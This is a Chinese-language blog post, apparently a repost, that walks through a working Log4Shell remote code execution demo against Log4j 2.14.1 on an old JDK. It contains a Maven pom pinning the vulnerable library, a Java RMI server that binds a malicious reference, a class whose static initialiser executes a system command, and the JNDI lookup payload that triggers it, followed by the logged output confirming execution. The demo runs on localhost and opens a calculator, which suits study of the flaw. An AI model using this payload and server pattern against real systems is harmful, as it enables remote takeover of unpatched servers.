了解關于漏洞的描述,可以參考Vulnerability Affecting Multiple Log4j Versions Permits RCE Exploit
根據文章描述,首先下載JDK1.8u102,不能高于這個版本,
通過如下pom.xml建立一個maven專案
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>Log4jJNDI</groupId>
<artifactId>Log4jJNDI</artifactId>
<version>0.0.1-SNAPSHOT</version>
<properties>
<java.version>1.8</java.version>
</properties>
<dependencies>
<!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core -->
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.14.1</version>
</dependency>
</dependencies>
<build>
<plugins>
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-compiler-plugin</artifactId>
<version>3.7.0</version>
<configuration>
<source>${java.version}</source>
<target>${java.version}</target>
</configuration>
</plugin>
</plugins>
</build>
</project>新建類Log4jServer,這個類用來注冊一個遠程類,代碼如下:
package testLog4j;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.Reference;
public class Log4jServer {
public static void main(String[] args) {
try {
LocateRegistry.createRegistry(1099);
Registry registry = LocateRegistry.getRegistry();
Reference evilObjReference = new Reference("testLog4j.EvilObj", "testLog4j.EvilObj", ".");
ReferenceWrapper evilObjReferenceObjWrapper = new ReferenceWrapper(evilObjReference);
registry.bind("evilObj", evilObjReferenceObjWrapper);
System.out.println("Server is running at port: 1099");
} catch (Exception e) {
e.printStackTrace();
}
}
}
用于打開計算器的遠程類代碼如下:
package testLog4j;
public class EvilObj {
static {
try {
Runtime.getRuntime().exec("calc");
} catch (Exception e) {
e.printStackTrace();
}
}
}
下面的LogTest類用于展示如何通過列印日志,來呼叫遠程類,
package testLog4j;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
public class LogTest {
private static Logger logger = LogManager.getLogger("LogTest");
public static void main(String[] args) {
logger.info("your operation system is: {}", "${java:os}");
logger.error("${jndi:rmi://127.0.0.1:1099/evilObj}");
}
}
首先運行Log4jServer類,此時在埠1099提供遠程類訪問,
然后再運行LogTest, 在列印如下日志以后,windows下的計算機被成功打開,運行時需要設定引數-Dlog4j2.formatMsgNoLookups=false
12-17 22:15:42.331 [main] INFO LogTest
your operation system is: Windows 10 10.0, architecture: amd64-64
12-17 22:15:42.334 [main] ERROR LogTest
${jndi:rmi://127.0.0.1:1099/evilObj}Good Luck,
Cheers!
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/385496.html
標籤:其他
上一篇:Goby的使用 漏洞掃描工具